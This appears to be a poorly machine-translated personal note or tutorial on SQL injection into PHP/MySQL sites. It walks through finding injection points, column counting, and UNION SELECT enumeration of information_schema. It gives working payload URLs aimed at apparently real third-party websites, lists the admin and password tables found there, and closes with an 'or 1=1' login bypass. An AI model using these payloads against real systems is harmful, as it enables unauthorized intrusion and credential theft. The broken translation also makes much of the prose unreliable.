Scripting language-php Language Basics tutorial (annotation, input debug, accept Processing) SQL statements Tutorial (query, insert, modify update, etc.) instance writing SQL injection test page Php+mysql injection (on) How to see what is the submission method, right-click on the review element in Firefox browser, Can be displayed in the network options. To prevent SQL injection, change the corresponding statement to the following sentence Is_numeric is only allowed to enter the number cmd call database Show databases display database name & nbsp show tables Display table name &N Bsp SELECT * FROM table name Show data in this table step 1. Find the page with parameters, 2. Enter the error parameter to see if the page is wrong, and if the error has an injection point 3. Binary guessing field by order statement by changing the number behind by, the number of 0 points is 4. If ASP injection skips this step (because Access does not have a database name, you can guess the table name directly for admin, and PHP injection first bursts the database name (If the statement does not have an error, it is changed to add an and 1=111, such as an error statement) 5. The number of errors is the database () database name user () DB user version () database version @@ Version_compile_os server operating system These replacements are queried 6. Query the table name query information_schema the table name under the name of the database tables information (condition: Table _schema=0x726f6f74 database named root) information_schema.tables:information_schema database name table name tables records all table name information in all databases Specific statement: http://www.st1.com/article.php?id=5 and 1=111 UNION SELECT 1
, GROUP_CONCAT (table_name), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
From information_schema.tables where table_schema=0x726f6f74 (This is the 16-bit transcoding of the database name) parameter: Group_concat () burst all the table names and then query the column names for all column names under the table name Yzsoumember Information_ Schema.columns: Table Specific example that records all column name information in all databases: Http://www.st1.com/article.php?id=5 and 1=111 UNION SELECT 1,
Group_concat (column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
From Information_schema.columns where Table_name=0x797a736f756d656d626572 (This is the transcoding of the table name) 7. The last step is the same as ASP injection, after knowing the table name and column name, the input statement bursts the user name and password access data hierarchy &N . Bsp column name &N Bsp content MySQL data hierarchy database name &NB Sp &N name Bsp , &NB Sp Column name nbsp content mysql information_schema root& nbsp yzsoumember username,password &NB Sp Content difference: The asp+access database is stored in the Site directory (can penetrate), the suffix format mdb,asp,asaphp+mysql database is stored under the database installation path (inaccessible), Suffix format myi,myd,frm.asp+access injection belongs to brute injection mysql5.0 above injection INFORMATION_SCHEMA: stores the table name and column name information under all databases database () database name user () database user version () database version @ @version_compile_os server operating system windows case insensitive Linux Case Sensitive http://www.makita.com.cn mutia0121 admin name,adminpass http://www.makita.com.cn/jishu.php?id=-63 UNION SELECT 1,group_ CONCAT (table_name), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.tables where table _schema=0x6d7574696130313231 http://www.makita.com.cn/jishu.php?id=-63 UNION SELECT 1,group_concat ( column_name), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Information_schema.coluMNS where table_name=0x61646d696e http://www.wh3z.cn/hdm1040458_db Intwho_ admin_user user_name,password http://www.wh3z.cn/article/view/id/-1411 UNION SELECT 1,2,3,GROUP_CONCAT (table_name), 5,6,7,8,9,10,11,12,13,14,15,16,17 from Information_schema.tables where table_schema=0x68646d313034303435385f6462 http://www.wh3z.cn/article/view/id/-1411 UNION SELECT 1,2,3,group_ Concat (column_name), 5,6,7,8,9,10,11,12,13,14,15,16,17 from Information_schema.columns where table_name= 0x696e7477686f5f61646d696e5f75736572 1. Two site Operations 2.php page Authoring phpmyadmin You can change the query statement by entering a specific SQL statement in the Login submission field. As input: admin ' or 1=1) #那么查询语句就成select user from PHP where (user= ' admin ' or 1=1) # ') and (pw= ' $pass ') etc. In the Select User from PHP where (user= ' admin ' or 1=1) Because # is an annotation character, the following is omitted
Penetration Test 2